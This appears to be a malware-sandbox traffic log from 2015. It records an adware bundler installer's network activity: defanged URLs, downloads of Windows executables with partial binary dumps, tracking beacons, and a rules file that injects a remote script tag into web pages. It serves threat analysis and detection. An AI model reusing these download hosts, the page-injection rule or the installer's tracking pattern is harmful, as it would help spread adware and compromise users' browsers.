hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish | |
hxxp://www.tjepgz.cc/3517/2 | |
hxxp://www.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip | |
hxxp://brsoftwarellc.com/services/rules.txt?dummy=504 | |
hxxp://brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 | |
hxxp://www.gosaferllc.com/services/rules.txt?dummy=534 | |
hxxp://www.gosaferllc.com/services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112 | |
hxxp://www.ninjasoftwarellc.com/services/rules.txt?dummy=243 | |
hxxp://www.ninjasoftwarellc.com/services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708 | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite | |
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm | |
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm | |
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install | |
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 | |
hxxp://up.soft365.com/Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf | |
hxxp://cdn1.downloadcrest.com/V19/amipb.js | |
hxxp://www.related.deals/services/rules?dummy=212 | |
hxxp://www.amoninst.com/index.php | |
hxxp://www.4threquest.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.4threquest.me/010914s/010914i.htm | |
hxxp://install.plainsavingscenter.com/ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA== | |
hxxp://www.amoninst.com/finalize.php | |
hxxp://www.amoninst.com/namen.php | |
hxxp://www.4threquest.me/registro/carregando.gif | |
hxxp://www.downloadcrest.com/tdownload.php | |
hxxp://www.related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 | |
hxxp://4threquest.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://4threquest.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= | |
hxxp://4threquest.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://e0.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm | |
hxxp://www.4threquest.me/registro/icone_cadeado.gif | |
hxxp://www.4threquest.me/010914s/verificar_ip.php | |
hxxp://www.mobimidia.com/mobile/MobiMidia_validation.js | |
hxxp://www.4threquest.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://install.plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y | |
hxxp://www.brsoftwarellc.com/services/rules.txt?dummy=504 | |
hxxp://www.mobimidia.com/mobile/mt-core.js | |
hxxp://install.plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= | |
hxxp://www.brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 | |
hxxp://www.4threquest.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://install.plainsavingscenter.com/if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ== | |
hxxp://www.related.deals/services/stores?dummy=526 | |
hxxp://www.amoninst.com/thankyou.php | |
hxxp://www.4threquest.me/registro/top-line.gif |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:56 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {. . ApiBlock = false;. //document.write(unescape(""));. . document.write(unescape(""));. . . . document.write(unescape(""));. function MobiMidia_addOption(selectId, txt, val, selected) {..var objOption = new Option(txt, val, selected);..self.document.getElementById(selectId).options.add(objOption);. }. function MobiMidia_keyNumber(e) {. if (e.keyCode != 9 && e.keyCode != 13) {. var keyChar = String.fromCharCode(e.which ? e.which : e.keyCode);. filteredValues = "1234567890";. if ((filteredValues.indexOf(keyChar) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 46)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(keyChar.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return false;. }. }. function MobiMidia_AtivaCel() {. if (self.document.getElementById('MobiMidia_DDD').value.length == 2) {. self.document.getElementById('MobiMidia_Number').focus();. }. }. . function MobiMidia_NonoDigito() {. if (self.document.getElementById('MobiMidia_DDD').value < 30) {.
<<< skipped >>>
GET /310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:34 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1112281
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_br.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1849280
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:46 GMT
Content-Type: application/octet-stream
Content-Length: 1112379
Last-Modified: Thu, 23 Apr 2015 07:24:03 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:56 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.30..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..X-Cache: BYPASS..CC: UA..Content-Encoding: gzip..18............s.......X.......0..
GET /services/rules.txt?dummy=504 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:32 GMT
Content-Type: text/plain
Content-Length: 94
Connection: keep-alive
Last-Modified: Fri, 13 Feb 2015 14:24:53 GMT
ETag: "5ac277-5e-50ef8fffcf740"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:32 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:32 GMT..Content-Type: text/plain..Content-Length: 94..Connection: keep-alive..Last-Modified: Fri, 13 Feb 2015 14:24:53 GMT..ETag: "5ac277-5e-50ef8fffcf740"..Cache-Control: max-age=600..Expires: Thu, 23 Apr 2015 07:34:32 GMT..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: EU..Accept-Ranges: bytes..</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.....
GET /services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:33 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: EU..
GET /registro/icone_cadeado.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a(.2....aH........z......i........r........X..7.......................8.. .....x..g.................?.....7..E.....n....f...^..$..H..............[........2...........:...........z.......m...W..l.................... ...................\........h..h4.p......*...........4.............. ..............u.....3........K....{(.....(...........#.....i..J..b..........m........o.....................N.................l.....#................c.................|..........I0............>....{.........N.|=.m$..........w(..E.......L...[.s.%...a..g*..........v...3.s........~..o .......................=..>....m...Z.....x...........1........g........d......9*..............._....................z..t..}........L..Y..B.....J..&.....0......................z>.. .q ...........E.|.............!.......,....(.2........H..?;2n}.....|....H.....S...1..9),...F.-.(7&..b.K...u..1...vn.z)RF....5.!..B!...L...-.........d.6.h.....2..h.&.?.1.&... .X1r..!D..da..t;0.7|s...*.lH.....U...........?.......p....HK..r...jp...(e.........y.c.........mT.d$q.. (....G.d..P...S..)f..D........Td.;tw.`!...#..C a.....0..z....Z..r..V.0.1.x3.?....(.6..l..C..y8"..N...=.L1B'....._....3|@.6#...8.(`......,.....;@QB#..BL..$.d7.L0..A...:60..8.|@...l0........hA...<"..I......R..tt.O.'.aH..).%!...@.Gx.........(..3W....0xP.$".P.............X`*.......^.J....!. ........G..t..........j...<.."..A.......i.QJ.......jI\l.Zp....k..........-.R....Yd.J.........n.?..H....D..DAo..jB_vJ.z.%................'lF.......R...]d..".*;0"H.`....@r... .@d@...C.mt.......dp.....3.=k..@
<<< skipped >>>
GET /010914s/010914i.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........m...k...4..d.^Q...\..RI......v".ck.*..Zu..3QJ....8..hi\.r]bvr*..x.....r.EM..U&..Xh3...9%.~..k..h.|...).v...v...vZ.<.. .9.#..]..!.x...a...D.A.......Y........8g....v.P.c7.;M.i..w.$.:nO.....A..A..).>.G.x9Nog...:;:.. ...@ '{.\o.U9..n.=Hj(...^...J8.;....g............`...G.....0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:26 GMT..Content-Type: text/html..Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT..Transfer-Encoding: chunked..Connection: keep-alive..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..CC: UA..Content-Encoding: gzip..2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........
<<< skipped >>>
GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:55 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 24 Apr 2015 07:23:55 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a).&..>...............!..5&..*))%.9..J..N..k..n*(U)%p*.VQ%%X."c&QPLLtttjhfaMf...$.....-&.9B.1B.S .ww.ii.RM.RM.po.dk.s...11.el.ZZ.c..a..{..y...{.........................................................!.....@.,....).&....@.pH,..H.o.l:..(S.KZ.G..............j.... pwX.....@.....-...cuHwy`..~......~-...[El.}...........*~...E.E`./..... ......Y.C........"."..10...% .B.Bz.-........."22442.1/'6L<%g....0.......B,.A. .e7v.0...........C....e..P...9p..1........1 .>F.0.@.QC.. u.H.b../...@.a.^.a.\. ..X...l.......7d.8...............hB..3G..Wc0Ci..=.C..<;....lsZ....2.7..y.g/F..2.e.1...;V<..".....gj..,d..).@.#...=^....B .zK...q-...q.......cD..r.b...2>...D...x.X&.F....c...,.Z..2..#.v..@t.....`.Z,=.^2..>..Av8...$......@`B........G!...`..-..BD6.......g...<...=D....l..........@......1.H.........0........>...>........B...........G...h....yUJ`...5...W.....|..PE1.&./X`A... .E...Y.(...Q.I0......ffAW....p......Q.\u..,....5...~..7..&.@.....AB.-.A........2....`.......nDK...,..._d...xq.m........k...........n.A..;..
GET /Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: up.soft365.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
14........................0..
GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.93 ms","message":"store 4 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:25:01 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.93 ms","message":"store 4 action and 0 update "}..0..
GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Thu, 19 Feb 2015 14:38:57 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 59352
X-Cache: Hit from cloudfront
Via: 1.1 182f7fa5c3814caf19acb317d3eb85ad.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nKgID5Yc-nIdvrx0eIsp9odtdHN-L9j0CNw7KuZU3PL21uaF8Ka0aw==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];....function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) { }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. var reported = 0;.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. for (var i = 0; i < g_reportedComps.length; i ) {.. if (g_reportedComps[i].sn == g_possibleComps[j].sn) {.. reported = 1;.. break;.. }.. }.. if
<<< skipped >>>
GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
